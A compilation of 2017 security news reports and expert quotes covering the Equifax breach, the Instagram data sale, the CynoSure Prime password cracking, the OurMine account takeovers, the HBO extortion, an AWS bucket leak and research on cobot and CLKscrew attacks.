“This is yet another case of a breach becoming public long after the incident itself occurred, which underlines the need for regulation. It's to be hoped that the GDPR (General Data Protection Regulation), which comes into force in May 2018, will motivate firms to, firstly, take action to secure the customer data they hold, and, secondly, notify the ICO of breaches in a timely manner.

The best way for organisations to combat cyber-attacks is by putting in place an effective cyber-security strategy before it becomes a target. Customers that entrust private information to businesses should be safe in the knowledge it is kept in a secure manner – and businesses should use security solutions to significantly mitigate the risk of a successful attack. There are also other measures that companies can take in order to provide thorough protection, which include running fully updated software, performing regular security audits and performing penetration testing.”
Tom Kellermann, CEO, Strategic Cyber Ventures:

“The credit bureaus have made mountains of money monitoring Americans credit. The cybercrime community is well aware that the bureaus house a treasure trove for data theft. It is my feeling that the majority of credit bureaus do not practice what they preach and have underinvested in cybersecurity.

Even if not victimized, we will be suffering from this breach for years to come. It is time that the government impose stringent security standards on the bureaus and correspondingly mandate the implementation of intrusion suppression architectures.”
Atiq Raza, CEO, Virsec:

“Given the frequency of major breaches it’s understandable if consumers are suffering from “breach fatigue” and not paying a lot of attention. But this breach is especially alarming and serious. Almost all the data that credit reporting companies like Equifax hold is sensitive, and much of it is used to establish identity – birth dates, addresses, drivers licenses, and other data types are routinely used to verify identity. It’s one thing to ask a consumer to change a password, but how do you change your birth date?

This also highlights that web applications remain a major vector of attack. Even as vulnerabilities are found and patched, hackers are developing new fileless techniques to fly under the radar of most security tools. It’s no longer adequate to base security defenses on past attacks – we need to shift to real-time monitoring and security for web applications and all the processes that support them.”
Ross Brewer, vice president and managing director EMEA, LogRhythm:

“If anything, this is a solid reminder that even though British and European consumers may not directly deal with overseas businesses, those organisations might still hold - and ultimately lose - our personal data. This is exactly why we need the incoming EU GDPR, to hand down appropriate penalties to those US companies collecting huge amounts of highly sensitive personal data on European citizens and then not protecting it. Let’s not forget, if the ICO were to impose the highest level fine - four percent of Equifax's turnover - it would be looking at a bill of over $100m.”
Ilia Kolochenko, CEO, Founder, High-Tech Bridge:

“It's a very colorful, albeit very sad, example how a vulnerability in a web application can lead to disastrous consequences for an entire company, its customer base and far beyond. Today, almost any critical data is handled and processed by web applications, but cybersecurity teams still seriously underestimate the risks related to application security. Most companies don’t even have an up2date application inventory. Without knowing your assets, you won’t be able to protect them. Many global companies still rely on obsolete automated solutions and tools for their application security, while cybercriminals are already using machine-learning in their attacks when targeting and profiling the victims for example.

Last but not least, such a delayed public disclosure of the breach is quite dubious. Probably the disclosure was reasonably postponed in the interests of investigation, but it still could endanger the victims. Most important now is to make sure that we do not underestimate the scale of the breach, and have properly identified every victim and the integrity of data that was stolen.”
Mike Shultz, CEO, Cybernance:

“The government has clearly endorsed the use of the NIST Cybersecurity Framework to strengthen enterprises from this devastating caliber of risk by focusing on people, policies, and processes. Had NIST CSF been employed by Equifax, this breach would not have happened. Further, the government provides protection for companies who use NIST and designated technology covered by SAFETY Act. These functions are in recognition of the risk to the U.S. economy from breaches just like this – this is no longer a suggestion, it is necessity.

It is the fiduciary duty of every C-suite and board of directors to act with reasonable business judgement to protect private information of consumers, and the fact that proper security measures were not set in place and consumers’ information has been held for weeks without notice means that responsibility has not been upheld. The FBI’s involvement since the breach was identified in May, and their offering of one year protection for every citizen in the U.S. also suggests that the ripple effect of this breach may be even greater than we’re aware.”
Nigel Hawthorn, chief European spokesperson, Skyhigh Networks:

“No doubt Equifax has been working feverishly behind the scenes since it found the breach in July. All businesses must think about the steps they would take in similar circumstances to investigate a breach, track the data lost and put together a communication plan to customers. Not having a pre-prepared and tested incident response plan causes delay in disclosing data loss which simply opens up the company to further criticism and reputation damage when information is eventually publicised. Moreover, companies have to ensure that they are aware of every outsourcer, business partner or cloud service that may be sharing data, as similar breaches at any of those will have repercussions up the chain.”
Kenneth Geers, senior research scientist, Comodo:

“It is ideal, if ironic, for cybercriminals to compromise the very companies that internet users rely on to safeguard their identities and finances. Cybercriminals would like to have enough information about you that they can in effect become you, and Equifax possesses that quantity and quality of data. Even if you are not a customer, Equifax likely has a lot of data about you, and you should take proactive steps in response to this hack.

The sheer size of this breach, which spans at least the U.S., Canada, and Great Britain, may have frightened some Equifax officials into selling a portion of their company shares.

On the technical side, it is critical that we learn what application was exploited, and what vulnerability was leveraged, so that other companies can take defensive action. The fact that the Trustedid.com site isn’t yet working means that Equifax was simply not ready for the level of responsibility that possession of this quantity and quality of digital information requires. It is alarming that, despite past cybersecurity compromises, Equifax today apparently has no chief information security officer (CISO) to talk to.”


Hackers Sell Celebrity Info Obtained in Instagram Hack

5.9.2017 securityweek Hacking
Hackers claim to have obtained the personal details of millions of Instagram users, including celebrities, after exploiting a vulnerability in the Facebook-owned photo-sharing service.

The data is sold on a website named DoxAGram, which is available both via regular Web access and over the Tor network. The site’s operators, allegedly based in Russia, claim to possess information on more than 200 million of Instagram’s 700 million users.

The full database is allegedly only available to people who spend at least $5,000 on their website. However, anyone can buy the phone number and/or email address of more than 6 million celebrities and other high profile users for $10 worth of bitcoin per record. Discounts have been offered for bulk purchases.

The Daily Beast obtained a sample of data from the operators of DoxAGram and determined that email addresses allegedly belonging to celebrities are indeed associated with Instagram accounts and they are not publicly available.

DoxAGram claims it’s a “100% legal service” that serves as a data broker. “We don't sell anything illegal only phone numbers as in phone books,” they said in a post on a Bitcoin forum.

The data was allegedly obtained using an Instagram API bug related to the password reset feature. The vulnerability was patched by Instagram after it was reported to the company by Kaspersky Lab researcher Ido Naor. A Saudi Arabian hacker using the online moniker “1337r00t” has published what he claims to be an exploit for this flaw on GitHub.

In a blog post published on Friday, Instagram co-founder and CTO Mike Krieger said the bug was quickly fixed and law enforcement notified. Krieger confirmed that the flaw could have been used to access private email addresses and phone numbers, but highlighted that passwords and other data was not exposed.

“Although we cannot determine which specific accounts may have been impacted, we believe it was a low percentage of Instagram accounts,” Krieger explained. “Out of an abundance of caution, we encourage you to be vigilant about the security of your account, and exercise caution if you observe any suspicious activity such as unrecognized incoming calls, texts, or emails.”

DoxAGram operators pointed out that the data they are offering could also be used in some cases to hijack Instagram accounts, but they don’t provide information on how it can be done and they “don’t recommend it.” It’s unclear if the recent hack of Selena Gomez’s account involved this recently patched vulnerability.


CynoSure Prime ‘cracktivists’ exposed 320 Million hashed passwords
4.9.2017 securityaffairs Hacking

The anonymous CynoSure Prime ‘cracktivists” reversed 320 million hashed passwords dumped to the popular researcher Troy Hunt.
The anonymous CynoSure Prime ‘cracktivists” is back and reversed 320 million hashed passwords dumped to the popular researcher Troy Hunt.

Two years ago the CynoSure Prime group reversed hashes of 11 million leaked Ashley Madison passwords. The hashed passwords were protected by the cryptographic algorithm Bcrypt, the algorithm implements “salting” of the hashed password to protect them against rainbow table attacks.

Recently the expert Troy Hunt who operates the data breach notification website HaveIBeenPwned has released the passwords that were grabbed from various sources such as the Exploit.in list (805,499,391 rows of email address and plain text password pairs, but with only 197,602,390 unique values) and the Anti Public list (562,077,488 rows with 457,962,538 unique email addresses, 96,684,629 unique passwords not already in the Exploit.in data).

The CynoSure Prime group along with German IT security PhD student @m33x and researchers Royce Williams (@tychotithonus) accepted the challenge.

The passwords disclosed by Hunt were sourced from various data leaks, many of them were protected with the weak hashing algorithms such as the SHA-1.

“Out of the roughly 320 million hashes, we were able to recover all but 116 of the SHA-1 hashes, a roughly 99.9999% success rate. In addition, we attempted to take it a step further and resolve as many “nested” hashes (hashes within hashes) as possible to their ultimate plaintext forms. Through the use of MDXfind [2] we were able to identify over 15 different algorithms in use across the pwned-passwords-1.0.txt and the successive update-1 and update-2 packages following that. We also added support for SHA1SHA512x01 to Hashcat [3].” reads the blog post published by the CynoSure Prime group.

password hasheds hashed passwords cynosure prime

The researchers noticed that 15 different hashes in use were using the MDXfind tool.

The experts noticed that the Hunt’s dump also includes personally identifiable information of some people that likely Hunt didn’t intend to release.

“We also saw unusual strings from incorrect import/export that was already present in the original leak. This links the hash to the owner of the password, which was clearly not intended by Troy. We found more than 2.5m email addresses and about 230k email:password combinations.”
<firstname.lastname@tld><:.,;| /><password>
<truncated-firstname.lastname@tld><:.,;| /><password>
<@tld><:.,;| /><password>
<username><:.,;| /><password>
<firstname.lastname@tld><:.,;| /><some-hash>
Hunt appreciated the CynoSure Prime work and confirmed the presence of junk data due to mistakes in parsing made by original authors.

Hunt is working with the CryptoSure Prime data to purge it from the hashed lists hosted at HaveIBeenPwned.

Giving a look at the reversing process, CryptoSure Prime used MDXfind and Hashcat running on a quad-core Intel Core i7-6700K system, with four GeForce GTX 1080 GPUs and 64GB of memory.

The researchers were able to “recover all but 116 of the SHA-1 hashes”.

CryptoSure Prime hashed passwords

According to the researchers, most of the passwords in the HaveIBeenPwned release are between 7 and 10 characters long, just for curiosity the longest password we found was 400 characters.

“In order to speed up the analysis of such a large volume of plaintexts, a custom tool was coded “Panal” (will be released at a later time) to quickly and accurately analyse our large dataset of over 320 million passwords. The longest password we found was 400 characters, while the shortest was only 3 characters long.” reads the post published by the CryptoSure Prime group. “About 0.06% of passwords were 50 characters or longer with 96.67% of passwords being 16 characters or less. Roughly 87.3% of passwords fall into the character set of LowerNum 47.5%, LowerCase 24.75%, Num 8.15%, and MixedNum 6.89% respectively. In addition we saw UTF-8 encoded passwords along with passes containing control characters. See [9] for full Panal output.”

CryptoSure-Prime hashed passwords
The experts concluded that even if blocking common passwords during account creation has positive effects on the overall password security of a website, blacklisting the entire Hunt’s archive can have unforeseeable consequences on usability.


The OurMine hacker group defaced WikiLeaks website with a DNS redirect
1.9.2017 securityaffairs Hacking

On Thursday, the notorious Saudi Arabian OurMine hacker group has defaced the website of the Wikileaks organization, WikiLeaks.org.
WikiLeaks it the last victim of the notorious OurMine hacker group, on Thursday the crew defaced the website of the organization,WikiLeaks.org.

The site was defaced and visitors were redirected through a DNS poisoning attack to a page created by OurMine displaying the following messages:

“Hi, it’s OurMine (Security Group), don’t worry we are just testing your…. blablablab, oh wait, this is not a security test! Wikileaks, remember when you challenged us to hack you?”

WikiLeaks Ourmine defacement

View image on TwitterView image on Twitter
Follow
x0rz @x0rz
Here are the hostile nameservers that appears to be linked with the attack on http://Wikileaks.org DNS (h/t @protoxin_) #WikileaksHack
1:36 PM - Aug 31, 2017
Replies 29 29 Retweets 42 42 likes
Twitter Ads info and privacy
The group accepted the Wikileaks’challenge for hacking its systems. It is important to highlight that WikiLeaks servers were compromised by the OurMine hacker group.

The Ourmine hacker group also sent a message to the Anonymous collective:
“Anonymous, remember when you tried to dox us with fake information for attacking wikileaks [sic]?” states the message. “There we go! One group beat you all! #WikileaksHack lets get it trending on twitter [sic]!”

Recently the Ourmine hacker group hijacked the official Twitter and Facebook accounts for Sony PlayStation Network (PSN) and claimed to have stolen PSN database.

The group also hacked social media accounts of HBO and Game of Thrones.

The Saudi Arabian group of white hat hackers hacked the Netflix US Twitter account (@Netflix) in December to promote its website and hacking services, it is known for its attacks against high-profile Twitter accounts. The list of victims is very long and includes Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta Daniel Ek, former Twitter CEO Dick Costolo, Twitter CEO Jack Dorsey, the CEO and founder of Spotify, Google CEO Sundar Pichai, and many others.

WikiLeaks did not comment the hack.


Oops! WikiLeaks Website Defaced By OurMine

31.8.2017 thehackernews Hacking

OurMine is in headlines once again—this time for defacing WikiLeaks website.
The notorious hacking group, OurMine, is known for breaching into high-profile figures and companies' social media accounts, including Facebook CEO Mark Zuckerberg, Twitter CEO Jack Dorsey, Google CEO Sundar Pichai, HBO, Game of Thrones and Sony's PlayStation Network (PSN).
According to screenshots circulating on Twitter, the official website of WikiLeaks has reportedly been defaced by the OurMine hacking group, who left a message on the site, as shown above.
WikiLeaks is a whistleblowing website that since March, has been revealing top CIA hacking secrets under Vault 7, including the agency's ability to break into different mobile and desktop platforms, security camera live video streams, air-gap computers and many more.
There is no indication of WikiLeaks servers and website been compromised, instead it seems their website has been redirected to a hacker-controlled server using DNS poisoning attack.
In DNS poisoning attack, also known as DNS spoofing, an attacker gets control of the DNS server and changes a value of name-servers in order to divert Internet traffic to a malicious IP address.
Shortly after the defacement, the site administrators regained access to their DNS server and at the time of writing, the WikiLeaks website is back online from its official legitimate servers.
OurMine is a Saudi Arabian group of hackers which claims to be a "white hat" security firm.
The group markets itself by taking over social media accounts of high-profile targets and then encourages them to contact the hacking group to buy its IT security service in an effort to protect themselves from future cyber attacks.


Selena Gomez Instagram hacked! Hackers post Bieber nude photos
30.8.2017 securityaffairs Hacking

Selena Gomez Instagram account has reportedly been hacked. Nude photos of singer Justin Bieber have been published by hackers.
Unknown hackers have compromised the Instagram account owned by Selena Gomez and posted nude photographs of her ex-boyfriend Justin Bieber.

Selena Gomez Instagram hacked
Source Tribune.com

The hack doesn’t seem to be associated with the recent Fappening 2017 hack or previous Fappening cases that hit many celebrities.

The Bieber nude images were clicked during a holiday in Bora Bora in 2015 and when the images were leaked online

The Selena’s Instagram account has more than 125 million followers, hackers hijacked it and posted three Bieber’s full-frontal shots of naked pictures.

The hacker published the Bieber’s naked photos on the Selena Gomez official Instagram account with this message:

“LOOK AT THIS N***A LIL SHRIMPY.”
The account was taken down Monday night after the hack, the staff of the popular star restored the access to the Instagram account and deleted the Bieber naked photos.

“The Bieber images were the same ones that were published after the pop star’s Bora Bora vacation in 2015. Gomez and Bieber used to be a couple, but are no longer together.” reported the outlet Variety.

“Bieber has said that the publication of the images, originally in the New York Daily News censored (though the uncensored versions later made the rounds online), made him feel “super violated.” “Like, I feel like I can’t step outside and feel like I can go outside naked,” he told Access Hollywood in 2015. “Like, you should feel comfortable in your own space… especially that far away.””

It is still unclear how hackers have hijacked the Selena Gomez Instagram account, it is likely the staff of the pop star was the victim of phishing attack.

A few days ago, private pictures of Anne Hathaway, Miley Cyrus, Stella Maxwell, Kristen Stewart, Tiger Woods and Lindsey Vonn have been posted online by a celebrity leak website.

Hackers gained access to celebrities’ iCloud accounts and stole their private photos and videos.

Dear star … force your staff enabling two-factor verification on your accounts, start adopting strong passwords, don’t share same credentials on different accounts, be vigilant on suspicious and unsolicited emails.


Hotel booking service Groupize allegedly exposed sensitive data contained in unsecured AWS storage bucket
23.8.2017 securityaffairs Hacking

Security researchers discovered that hotel booking service Groupize allegedly exposed sensitive data contained in unsecured AWS storage bucket
Security experts continue to discover unsecured AWS storage bucket leaking sensitive data. Last discovery in order of time is an AWS storage related to the hotel booking service Groupize, it was discovered by Kromtech Security Center researchers and confirmed in an analysis published by MacKeeper.

“Kromtech Security Researchers have discovered a database that appeared to be associated with the automated online group hotel room booking service Groupize.” wrote MacKeeper.

“Publicly accessible bucket was hosted under ‘prm-production’ domain on AWS. No logins or passwords were required to access the data.”

Groupize data leak

Groupize denies that sensitive has been leaked, but MacKeeper’s researcher Bob Diachenko claims that until August 15 the exposed data included nearly 3,000 documents detailing contracts or agreements between hotels, customers and Groupize, including credit cards’ payment authorization forms, more than 3,000 spreadsheets, more than 32,000 “menus, and images.

“Here is what researchers were able to see:

A folder named “Documents” contained 2,936 scans or PDFs of contracts or agreements between hotels, customers and Groupize, including credit cards’ payment authorization forms, with full CC#, expiration date and CVV code.
A folder named “all_leads” contained 3,188 spreadsheets. In a single random sampling there was a total of $12.6 Million in just one spreadsheet.
Folders titled WhiteLabel / attachments contained 32,695 files in 37 folders ( these are menus, images and more)”
Recently other AWS S3 leaking data have been discovered, the popular data breach hunter Chris Vickery discovered a Verizon repository that leaked 14 million customer records and an open bucket belonging voting machine supplier ES&S that contained more than 1.8 million voter records belonging to Americans.

It is easy to predict the discovery of many other open AWS storages left open online.

A few weeks ago Amazon presented its service Macie, which would detect unsecured corporate data repositories.

“Amazon Macie is a service powered by machine learning that can automatically discover and classify your data stored in Amazon S3. But Macie doesn’t stop there, once your data has been classified by Macie, it assigns each data item a business value, and then continuously monitors the data in order to detect any suspicious activity based upon access patterns.” wrote Amazon.


Researchers Demo Remote Hacking of Industrial Cobots

23.8.2017 securityweek Hacking
Researchers at security firm IOActive have shown how a remote attacker can hack an industrial collaborative robot, or cobot, and modify its safety settings, which could result in physical harm to nearby human operators.

A few months ago, IOActive published a brief report providing a high-level description of its research into robot cybersecurity. Researchers analyzed industrial and business robots from six vendors, including SoftBank Robotics, UBTECH Robotics, ROBOTIS, Universal Robots, Rethink Robotics and Asratec Corp.

A brief analysis of mobile applications, software and firmware led to the discovery of nearly 50 vulnerabilities, including weaknesses related to communications, authentication, authorization mechanisms, cryptography, privacy, default configurations, and open source components.

Cesar Cerrudo, CTO at IOActive, and Lucas Apa, Senior Security Consultant at IOActive, warned at the time that the security holes could be exploited for spying and stealing sensitive data, and even cause physical damage or harm in the case of industrial robots. They have now shared technical details and videos demonstrating some of their findings.

Cobots share a workspace with human operators and help them perform various tasks. Unlike traditional industrial robots, which execute repetitive tasks, they can learn new movements, see using cameras and hear via microphones.

Cobots are used not only in industrial environments, but IOActive’s research has focused on industrial models, namely the Baxter/Sawyer cobots for industrial automation from Rethink Robotics and UR from Universal Robots.

Cerrudo and Apa showed how a remote attacker could chain six vulnerabilities to modify a UR robot’s safety settings and disable emergency functions, which could pose a serious threat to human lives.

“Imagine what could happen if an attack targeted an array of 64 cobots as is found in a Chinese industrial corporation,” the researchers warned.

Technical details have been provided for each of the exploited flaws, along with a video showing how an attacker can disable safety features and cause a robot arm to act “crazy.”

While some of the robot manufacturers contacted by the IOActive researchers have taken steps to address the vulnerabilities, others have downplayed the risks and did not release any patches. In the case of cobots, Rethink Robotics fixed the flaws discovered by the experts back in February, but UR still hasn’t resolved the issues affecting its products.

IOActive is not the only security firm to analyze industrial robots. Researchers at Trend Micro and the Polytechnic University of Milan published a paper a few months ago on the cybersecurity risks associated with industrial robots, and warned that some machines could be attacked directly from the Internet.

Elon Musk, CEO of Tesla and SpaceX, along with more than 100 robotics and artificial intelligence entrepreneurs recently sent a letter to the United Nations calling for action to prevent the development of robotic weapons.


Ourmine hacked PlayStation Social Media Accounts to announce the theft of PSN Database
22.8.2017 securityaffairs  Hacking

Ourmine hacker crew hijacked the official Twitter and Facebook accounts for Sony PlayStation Network (PSN) on Sunday and claims to have stolen PSN database.
The dreaded Ourmine hacker crew is back, after the recent hack of social media accounts of HBO and Game of Thrones, the team hijacked the official Twitter and Facebook accounts for Sony PlayStation Network (PSN) on Sunday.

The Saudi Arabian group of white hat hackers hacked the Netflix US Twitter account (@Netflix) in December to promote its website and hacking services, it is known for its attacks against high-profile Twitter accounts. The list of victims is very long and includes Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta Daniel Ek, former Twitter CEO Dick Costolo, Twitter CEO Jack Dorsey, the CEO and founder of Spotify, Google CEO Sundar Pichai, and many others.

On Sunday evening Ourmine published a tweet to claim the hack of PlayStation Network and theft of its database.

Other tweets posted by the group were inviting the company to contact them through the Ourmine website and pay for the security service offered by the crew.
“PlayStation Network Databases leaked #OurMine,” the first tweet by OurMine on the compromised PlayStation Twitter account read.
“No, we aren’t going to share it, we are a security group if you work at PlayStation then please go to our website,” reads another Tweet published by the group.
PSN Ourmine sony-playstation-hacked
The tweets and the Facebook post were promptly deleted.

OurMine shared the same message on the PlayStation Network’s official Facebook page.
At the time, it is still unclear if OurMine has stolen the PSN’s database.
Last time the company was breached was in 2011 when the PlayStation hack exposed the personal details of more than 77 Million PSN users.


Mr.Smith, HBO hackers threaten to leak final episode of Game of Thrones 7
22.8.2017 securityaffairs  Hacking

The bad actors behind the HBO hack are back and are threatening to leak the final episode of the seventh season of Game of Thrones.
The threat actor that has hacked into the HBO announced that it will leak the final episode of Game of Thrones season 7.The hacker who claimed the responsibility for the hack called himself Mr. Smith, he told Mashable media outlet to “Be ready for GOT S& E6 &E7 as soon as possible.”
Cyber criminals claiming to have hacked television group HBO networks were demanding millions of dollars in ransom payments from the company while threatening to release more material.

The alleged hackers published a five-minute video letter to HBO chief Richard Plepler claiming to have “obtained valuable information” in a cyber attack. Cybercriminals said they had stolen 1.5 terabytes of data.
The worst news for HBO is that the hackers are also claiming to be in possession of login credentials to access “many HBO platforms already.”

“And while the latest data dump doesn’t include any Game of Thrones spoilers, it definitely contains some information that the network wouldn’t want out in the open.” reported Mashable.

“Specifically, what appears to be the login credentials for almost every single HBO social media account. Passwords for everything from @HBO, @GameOfThrones, and @WestworldHBO to various Instagram and Giphy accounts were in a text document provided to us by the so-called “Mr. Smith group.”

For legal reasons, journalists at Mashable did not attempt to login into the accounts provided by Mr. Smith, but they explained that they have no reason to doubt their authenticity. If confirmed this means that hackers gained access to almost every single HBO social media account.

The hackers reportedly defaced HBO Giphy accounts, including one titled “HB-Old Is Dying,” which repeated the previous message that “HBO is falling.”

HBO replied to the threat with its past statement: “We are not in communication with the hacker, and we’re not going to comment every time a new piece of information is released. It has been widely reported that there was a cyber incident at HBO. The hacker may continue to drop bits and pieces of stolen information in an attempt to generate media attention. That’s a game we’re not going to participate in.”

Mr. Smith requested HBO half of the group’s annual budget of $12 million to $15 million to stop leaking the files.

hbo Games of Thrones

The hackers claim a long work to compromise the company network, it took six months to break into the company systems, they also added to have purchased $500,000 a year zero-day exploits that let them hack the firm exploiting flaws in Microsoft and other software used by HBO.

According to a report from a leaked memo by Variety, in response to the incident, HBO offered a reward of $250,000. The payment was offered as a “bug bounty,” to discover vulnerabilities in their its computer networks.

Unfortunately, “Mr. Smith” and his crew weren’t satisfied by the offer that doesn’t match their millionaire demands to stop leaking sensitive data, the crooks’ request would be more than $6 million.

HBO also accidentally leaked Game of Thrones Season 7 Episode 6.
Another popular hacker crew, the OurMine, claimed responsibility for hijacking the main social media accounts at HBO as well as the Game of Thrones Twitter account on August 16.“Hi, OurَMiَne are here, we are just testing your security, HBO team please contact us to upgrade the security – ourmine.org -> Contact.” states the message published by the group on the HBO account.
Game of Thrones HBO hacked


Sony PlayStation Social Media Accounts Hacked; Claims PSN Database Breach
21.8.2017 thehackernews Hacking

After hacking social media accounts of HBO and its widely watched show Game of Thrones, a notorious group of hackers calling itself OurMine took control over the official Twitter and Facebook accounts for Sony's PlayStation Network (PSN) on Sunday.
After taking over the accounts, OurMine, Saudi Arabian group of hackers which claims to be a "white hat" security firm, posted its first tweet on Sunday evening, claiming to have breached PlayStation Network and stolen its database.
The tweet followed by a series of tweets encouraging the company to contact the hacking group through its website to buy its IT security service in an effort to protect itself from future cyber attacks.
"PlayStation Network Databases leaked #OurMine," the first tweet by OurMine on the compromised PlayStation Twitter account read.
"No, we aren't going to share it, we are a security group if you work at PlayStation then please go to our website," the followed Tweet read.
The hacking group also posted similar content on the PlayStation Network's official Facebook page that has more than 37 million followers.

Both tweets and Facebook messages posted by the hacking group were deleted shortly.
At the time, it is unclear if OurMine has access to PSN's database or their Tweets and Facebook posts were just to spread fear among the company and its customers.
However, the company suffered a massive data breach in 2011, when the PlayStation hack exposed the personal details of the entire PSN user base (over 77 Million at the time), including users names, date of births, email addresses, and credit card details.
The hacking incident was the largest identity theft on record, which forced Sony to shut down its entire system for almost a month. Anonymous took responsibility for the data breach.
Ourmine is the same hacking group that previously compromised social media accounts of major companies CEOs, including Facebook CEO Mark Zuckerberg, Twitter CEO Jack Dorsey, and Google CEO Sundar Pichai.
In the majority of cases, Ourmine gains access to the social media accounts by using credentials exposed in previous, publicly known data breaches.
However, the group does not seem to ever go beyond just demonstrating its ability to take over the account, without doing significant damage to the accounts or its protected information.
OurMine markets itself as a security firm that offers companies security against cyber attacks, charging up to $5,000 for a "scan" of their social media accounts, site security holes, and other security vulnerabilities.


PlayStation Social Media Accounts Hacked

21.8.2017 seurityweek  Hacking
A notorious hacking firm, probably best described as greyhats rather than white or blackhats, briefly breached the PlayStation Facebook and Twitter accounts on Sunday.

OurMine, a Saudi-based security firm, specializes in breaching high-profile accounts in order to advertise its 'prowess' and sell its security services. Yesterday, it got into PlayStation's Twitter and Facebook accounts, and claimed to have stolen 'PlayStation Network Databases.' All messages were quickly removed by Sony, but not before they had been seen, and not before PlayStation users' concerns were raised.

The messages left on Facebook were potentially the more worrying: "Playstation, contact us we got Playstation Network database leaked!" This immediately provoked memories of the massive 2011 breach which forced Sony to shut down the PlayStation Network and Store, and had the personal information of some 77 million PSN users stolen.

Tweets posted by OurMine on PlayStation's Twitter account were in the same vein, but added, "No, we aren't going to share it, we are a security group, if you works at Playstation then please go to our website ourmine.org."

Unless OurMine has changed its method of operation, then it is unlikely to leak any personal information – in fact, it is quite possible that the social media accounts are the totality of its success against PlayStation. However, this cannot be guaranteed; and until official comment comes from Sony, it cannot be guaranteed that PlayStation networks have not been breached and personal data stolen.

"It's quite unlikely that the database is indeed stolen," comments High-Tech Bridge CEO Ilia Kolochenko. "On the other hand, it can be a smart smoke screen to camouflage a large-scale data breach and distract attention of cybersecurity teams from the real problem. However, until Sony makes an official statement about their internal investigation, it's too early to make any conclusions."

At this stage, it cannot even be guaranteed that the social media hacks were performed by OurMine. The most recent hack it acknowledges on its website is the April 2017 YouTube hack, which it describes as "the biggest hack in YouTube history!" During 2016, OurMine is believed to have breached the Twitter accounts of Wikipedia co-founder Jimmy Wales, Pokemon Go creator John Hanke, Twitter co-founder Jack Dorsey, Google CEO Sundar Pichai, and Facebook co-founder Mark Zuckerberg – whose Pinterest was also hacked.

During 2017, OurMine has been 'credited' with further hacks against the Unity user forum, and, last week, against HBO's media accounts. The message left on HBO was typical: "Hi, OurMine here, we are just testing your security, HBO team please contact us to upgrade the security." HBO quickly regained control of the account and removed the messages.

The HBO Twitter hack is not thought to be related to the theft of 1.5TB of data from HBO. Earlier this month, these hackers released the personal phone numbers of Game of Thrones actors, emails and scripts. They are demanding a ransom of $6 million for the return of HBO's proprietary information.

SecurityWeek has contacted both Sony and OurMine and asked for comments on the PlayStation Twitter breach. This story will be updated with any reply.


Energy Management Systems Expose Devices to Attacks

21.8.2017 securityweek  Hacking
Researchers have demonstrated a new class of fault attacks possible due to the poor security design of energy management systems present in most modern computing devices.

Energy management is an important feature of modern computers, particularly in the case of mobile devices, as it helps increase battery life, improve portability and reduce costs. However, since designing such systems is not an easy task, focus has been placed on efficiency and security has often been neglected.

At the recent USENIX Security Symposium, a team of experts from Columbia University presented an attack method they have dubbed “CLKscrew.” They showed how a malicious actor could exploit the lack of security mechanisms in energy management systems to carry out a remote attack and obtain sensitive data.

The research has focused on the ARMv7 architecture – a Nexus 6 smartphone was used in experiments – but the CLKscrew attack likely also works against other devices and architectures. The energy management system analyzed by the researchers is the widely used dynamic voltage and frequency scaling (DVFS).

The CLKscrew attack shows how a remote hacker could use a malicious kernel driver loaded onto the targeted device to exploit security weaknesses in DVFS and breach the ARM Trustzone, a hardware-based security technology built into system-on-chips (SoCs).

Experts demonstrated how an attacker can use the method to extract secret crypto keys from Trustzone, and escalate privileges by loading self-signed code into Trustzone.

Researchers believe this type of attack is much more efficient than attacks involving physical access to the targeted device due to the fact that it can be carried out remotely and it bypasses many of the requirements and barriers of a physical attack, such as the need for soldering equipment and the ability to overcome existing physical defenses.

“CLKscrew is the tip of the iceberg: more security vulnerabilities are likely to surface in emerging energy optimization techniques, such as finer-grained controls, distributed control of voltage and frequency islands, and near/sub-threshold optimizations,” researchers said in their paper.

“Our analysis suggests that there is unlikely to be a single, simple fix, or even a piecemeal fix, that can entirely prevent CLKscrew style attacks. Many of the design decisions that contribute to the success of the attack are supported by practical engineering concerns,” they added. “In other words, the root cause is not a specific hardware or software bug but rather a series of well-thought-out, nevertheless security-oblivious, design decisions.”


Game of Thrones and HBO — Twitter, Facebook Accounts Hacked

17.8.2017 thehackernews  Hacking

The Game of Thrones hacking saga continues, but this time it's the HBO's and GOT's official Twitter and Facebook accounts got compromised, rather than upcoming episodes.
As if the leak of episodes by hackers and the accidental airing of an upcoming episode of Game of Thrones by HBO itself were not enough, a notorious group of hackers took over the official Twitter and Facebook accounts for HBO as well as Game of Thrones Wednesday night.
The hacker group from Saudi Arabia, dubbed OurMine, claimed responsibility for the hack, posting a message on both HBO's official Twitter and Facebook accounts, which read:
"Hi, OurMine are here, we are just testing your security, HBO team, please contact us to upgrade the security," followed by a contact link for the group.
This message was followed by another one, wherein hackers asked people to make the hashtag #HBOhacked trending on Twitter, which it did.
Ourmine is the same group of hackers from Saudi Arabia that previously compromised social media accounts of major companies CEOs, including Twitter CEO Jack Dorsey, Facebook CEO Mark Zuckerberg, Google CEO Sundar Pichai, and Facebook-owned virtual reality company Oculus CEO Brendan Iribe.
In most of the cases, Ourmine hackers gain access to the social media accounts by credentials exposed in previous, publicly known data breaches.

However, the hacking group does not seem to ever go beyond just demonstrating its ability to take over the account, without doing much damage to the accounts or its protected information.
OurMine offers companies security against hacking, charging up to $5,000 for a "scan" of their social media accounts, site security holes, and other security vulnerabilities, and advertises its commercial services by breaking into famous accounts.
HBO managed to remove the offending tweets shortly after the hackers posted them.
Just yesterday, in a devastating blunder, HBO Spain accidentally aired Episode 6 of Game of Thrones season 7 five days prior to its official premiere.
The popular entertaining company is also facing a threat from hacker or group of hackers who claimed to have obtained nearly 1.5 terabytes of information from HBO.
Over two weeks ago, the unknown hackers dropped episodes of "Ballers" and "Room 104," along with a script of the fourth episode of Game of Thrones on the internet.
This leak was followed by another dump of a half-gigabyte sample of stolen data, including the company's emails, employment agreements, balance sheets, and the script of the upcoming GOT episode, demanding a ransom—nearly $6 Million in Bitcoins.
Although it was revealed that the company offered hackers $250,000 for extending the ransom payment deadline by one week, the proposal apparently failed to satisfy hackers, and they threatened to release more data every Sunday until the full ransom was paid.


Oopss! HBO Itself Accidentally Leaked 'Game of Thrones' Season 7 Episode 6

17.8.2017 thehackernews  Hacking

HBO doesn't need hackers to leak its widely watched "Game of Thrones" episodes, as it is sufficient enough to leak them by its own.
In what seems to be a terrible blunder, HBO Spain appeared to have accidentally broadcast the next episode—Episode 6—of Game of Thrones season 7 five days before its official premiere.
And as expected, the GoT episode 6 quickly began circulating online.
